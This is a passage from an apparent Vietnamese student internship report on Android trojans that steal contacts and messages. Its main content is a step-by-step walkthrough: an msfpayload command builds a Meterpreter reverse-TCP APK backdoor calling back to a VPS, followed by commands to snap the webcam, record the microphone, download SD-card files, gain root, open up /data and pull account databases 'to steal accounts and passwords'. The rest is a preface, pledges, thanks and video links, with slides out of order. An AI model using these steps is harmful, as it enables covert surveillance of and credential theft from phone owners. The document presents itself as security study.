phí đến mail khi tải phần mềm. Sau khi điền key nhấn Activate License:
2.Từ VPS điều khiển thiết bị qua internet
Các bước thực hiện
1. Sử dụng Kali Linux để tạo file APK làm backdoor để hack
vào Android như trên mang Lan với địa chỉ IP là địa chỉ của VPS
39. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Chúng ta vẫn sử dụng lệnh “Msfpayload
android/meterpreter/reverse_tcp lhost=14.0.21.132 lport=4444 R >
/root/Desktop/files.apk” ở đây địa chỉ VPS là 14.0.21.132
2. Khởi động Metasploit Console trên VPS
3. Chúng ta thực hiện các bước xâm nhập như đã đề cập ở phần
trên, ở đây chỉ khác là sử dụng chính IP của VPS
4. Sau khi máy nạn nhân tải về file apk đã được tạo ra, máy android đó sẽ bị
hack
40. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
5. Sử dụng lệnh Help để xem các lệnh được metasploit hỗ trợ
Để xem các lệnh ta gõ help
Để xem thông tin về máy, nhập lệnh SysInfo
Để xem các tác vụ đang chạy gõ ps
Xem ip gõ ipconfig
41. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Xem danh sách thư mục, file gõ ls
• Sử dụng camera:
Để xem danh sách camera, nhập webcam_list
Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở
danh sách camera ở phần trước.
• Ghi âm
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
• Lấy file từ sd card
Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư
mục
Dùng lệnh cd /sdcard/Download để vào thư mục
Để tải về máy, ta nhập lệnh
Download App.apk
để upload gõ lệnh upload
Và file này sẽ được tải về thư mục root của máy Kali
Gõ shell để vào lệnh
kiểm tra xem có root chưa gõ
su
whoami
Nếu báo unknown id is 0 tức là đã root
ls -l danh mục file và các quyền
cd để chuyển hướng thư mục
Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền
/DATA
/DATA/APP
/DATA/SYSTEM
/DATA/SYSTEM/accounts.db
/DATA/SYSTEM/SYNC/accounts.xml
/SYSTEM/APP/
để xem danh sách và down load các file hay thay đổi các file trong ROM
đầu tiên phải gõ lệnh SU để có toàn quyền truy cập
để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename
42. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Ví dụ chmod -R 777 /data
^C để quay lại
Sử dụng SQLite để mở file db
Link “slideshare” và “youtube”
o Hướng dẫn cài đặt Genymotion:
https://www.youtube.com/watch?v=cwJTJHnIueA&feature=youtu.be
o Hướng dẫn cài đặt iCalendar tren Android SDK:
https://www.youtube.com/watch?v=4Vquz5jim0g
o Hướng dẫn cài đặt Kali Linux trên VMware:
https://www.youtube.com/watch?v=DSTEsV6aGqM&feature=youtu.be
o Hướng dẫn cài đặt Metasploit trên VPS:
https://www.youtube.com/watch?v=hy-5XzgpkrU&feature=youtu.be
o Giới thiệu bản thân:
https://www.youtube.com/watch?v=R07TqXdtIGg
o Những thuận lợi và khó khăn:
https://www.youtube.com/watch?v=io-JPztHbhg
43. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Lời mở đầu
Trong những năm gần đây, vấn đề “ an toàn và bảo mật thông tin “ đang ngày càng nóng bỏng
với sự phát triển của hệ điều hành Ios, adroid, windownphone và các dòng smartphone , vấn
đề bảo mật thông tin chuyển dần xu hướng từ Pc sang mobile . Nếu bạn đang sở hữu một
chiếc điện thoại từ apple, nokia, samsung ,… liệu bạn có dám chắc là điện thoại của mình có
bị nhiễm cá các phần mềm gián điệp đánh cắp dữ liệu hay không ? Vì sao lại như vậy ? Vì
theo báo cáo gần đây của các hãng phần mềm như Kaspersky Lab , avast , BKAV , số lượng
smartphone bị nhiễm mã độc ngày càng nhiều . Đặc biệt là hệ điều hành android là một trong
những hệ điều hành phát triển mạnh mẽ trong những năm gần đây , là một mảnh đất tốt cho
các hacker tấn công . Với sự thiếu hiểu biết của người dùng đã vô tình tạo cơ hội cho các
hacker xâm nhập và cài mã độc trên chính các điện thoại của bạn .
Đề tài “ nghiên cứu các Trojan, Malware, cho phép đánh cắp dữ liệu như danh sách contact,
tin nhắn trên điện thoại android và gửi ra ngoài” , sẽ giúp ta nghiên cứu và tìm hiểu cách thức
hoạt động chia sẻ thông tin cũng như giải pháp để phòng tránh .
44. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Lời cam kết
Tôi xin cam kết những nội dung trong cuốn báo cáo này là do tự bản thân thực hiện dưới sự
hướng dẫn của thầy Võ Đỗ Thắng và quá trình tự tìm hiểu trên mạng và không phải sao chép
từ một nguồn nào
45. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Lời cảm ơn khoa
Lời tiếp theo tôi xin cám ơn các thầy cô trong khoa ĐiệnTử – Viễn Thông
Trường ĐH Khoa Học Tự Nhiên đã cấp giấy giới thiệu và tạo điều kiện tốt cho sinh viên
đến thực tập tại Trung tâm, em cũng xin gửi lời cám ơn đến các bạn bè, đồng nghiệp đã
luôn đồng hành và hỗ trợ em trong suốt quá trình thực tập
Tuy đã có gắng nỗ lực nhưng trong quá trình thực tập và viết báo cáo em không thể
tránh khỏi sai sót, kính mong nhận được sự thông cảm và góp ý của Trung tâm cũng như
các thầy cô trong khoa, em xin chân thành cám ơn.
46. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Thầy : Võ Đỗ Thắng – Giám đốc trung tâm Athena
47. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT,
TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Lời cam kết
Tôi xin cam kết những nội dung trong cuốn báo cáo này và các clip quá trình là
do tự bản thân thực hiện dưới sự hướng dẫn trực tiếp của thầy Võ Đồ Thắng
cùng với quá trình tự tìm hiểu trên mạng , không phải sao chép từ một nguồn
nào .
Link slide :
- Báo cáo giữa kỳ : http://www.slideshare.net/TrongAnHCMUS/bao-caogiuaki
- Báo cáo cuối kỳ :
- Tạo mã độc trên Kali Linux để xâm nhập Android (mạng Lan ) :
http://www.slideshare.net/TrongAnHCMUS/to-m-c-trn-kali-linux-xm-nhp-
android-mng-lan
- Tạo mã độc trên VPS để xâm nhập Android ( môi trường Internet ):
http://www.slideshare.net/TrongAnHCMUS/to-m-c-trn-vps-xm-nhp-android-
mi-trng-internet
Link youtube :
- Clip thuận lợi, khó khăn:
https://www.youtube.com/watch?v=MIU61EMLmwM
- Clip giới thiệu bản thân :
https://www.youtube.com/watch?v=wvjhuih9zkA&feature=youtu.be
- Cài đặt Kali Linux :
https://www.youtube.com/watch?v=hpy8l1X2vVU&feature=youtu.be
- Tạo mã độc trên Kali Linux để xâm nhập Android ( mạng Lan ):
https://www.youtube.com/watch?v=DvtJBVFvE6k&feature=youtu.be
- Tạo mã độc trên VPS để xâm nhập Android ( môi trường Internet ):
https://www.youtube.com/watch?v=af3JkOZ8PSo&feature=youtu.be
SVTT : Trần Trọng An